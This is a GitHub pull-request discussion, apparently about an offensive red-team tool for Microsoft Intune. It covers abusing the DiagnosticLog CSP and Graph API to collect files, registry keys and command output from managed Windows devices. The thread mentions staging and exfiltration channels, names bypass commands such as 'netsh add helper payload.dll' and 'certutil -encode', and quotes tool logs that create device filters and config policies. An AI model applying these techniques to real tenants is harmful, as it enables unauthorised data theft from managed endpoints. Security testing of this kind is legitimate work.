Open pl4nty opened 1 month ago
pl4nty
commented
1 month ago My test token from intune.microsoft.com was missing a upn claim too, so I added a fallback to email.
I also hit a strange bug where the test token was missing from requests, added this workaround in a few places because I couldn't find the root cause.
pl4nty
commented
1 month ago Besides the DiagnosticLog CSP, I've been playing with win32 storage and Delivery Optimization for staging/exfil. Could PR the results early next year if you'd like? The authn flows are pretty gnarly though
Mayyhem
commented
4 weeks ago This looks really useful @pl4nty ! Great stuff! I'll take look in my lab and get back to you with any questions I have before merging. Thank you for the contribution!
Mayyhem
commented
4 weeks ago I fixed the provided access token bug, added deletion commands for the artifacts, and allowed optional device sync. I'm still trying to "catch" the PUT request. Does IME check that the destination is a valid web service or does it just send the PUT wherever it's pointed? I've been using netcat without success.
Mayyhem
commented
4 weeks ago I think it's just from spamming sync all day. These rate limits make troubleshooting pretty painful.
Supports registry keys, event logs, command output, and files/folders, subject to significant restrictions. Could bypass (
netsh add helper payload.dllorcertutil -encodecome to mind), but they're pretty noisy. This talk might have some ideas. https://learn.microsoft.com/en-us/windows/client-management/mdm/diagnosticlog-csp#diagnosticarchivearchivedefinitionI used config for simplicity. Might be worth reminding users to
syncafteruploadfor faster results, but not automating it in case they want to batch changes and avoid the ratelimit.An alternative to config is writing regkeys via script like
then triggering diag log collection via Graph, and polling until the archive is available for download. I think that triggers a WNS notif so could be much faster, and uses Intune-managed storage, but leaves artefacts in the registry and in Intune.
Did some quick tests of these changes with
exec intune upload --access-tokenand I've used similar payloads before, but ran out of time for e2e testing tonight.Logs
``` 2024-11-02 15:23:39.489 UTC - [INFO] Execution started 2024-11-02 15:23:39.693 UTC - [DEBUG] Database option not used, skipping storage of this Jwt 2024-11-02 15:23:39.697 UTC - [INFO] Creating new device assignment filter with displayName: 70c3ccd5-1aae-4e28-ac39-39f54c06abf2 2024-11-02 15:23:39.737 UTC - [VERBOSE] Sending POST request to: https://graph.microsoft.com/beta/deviceManagement/assignmentFilters 2024-11-02 15:23:42.444 UTC - [VERBOSE] Received 201 (Created) status code from: https://graph.microsoft.com/beta/deviceManagement/assignmentFilters {"@odata.context":"https://graph.microsoft.com/beta/$metadata#deviceManagement/assignmentFilters/$entity","id":"d91f479f-06d8-4126-b26f-1a0b803385ae","createdDateTime":"2024-11-02T15:23:35.8286302Z","lastModifiedDateTime":"2024-11-02T15:23:35.8286302Z","displayName":"70c3ccd5-1aae-4e28-ac39-39f54c06abf2","description":"","platform":"windows10AndLater","rule":"(device.deviceName -eq \"1234\")","roleScopeTags":["0"],"assignmentFilterManagementType":"devices","payloads":[]} 2024-11-02 15:23:42.446 UTC - [INFO] Obtained filter ID: d91f479f-06d8-4126-b26f-1a0b803385ae 2024-11-02 15:23:42.455 UTC - [INFO] Creating custom config policy for device: 1234 2024-11-02 15:23:42.459 UTC - [VERBOSE] Using ArchiveDefinition:For more details, open the Copilot Workspace session.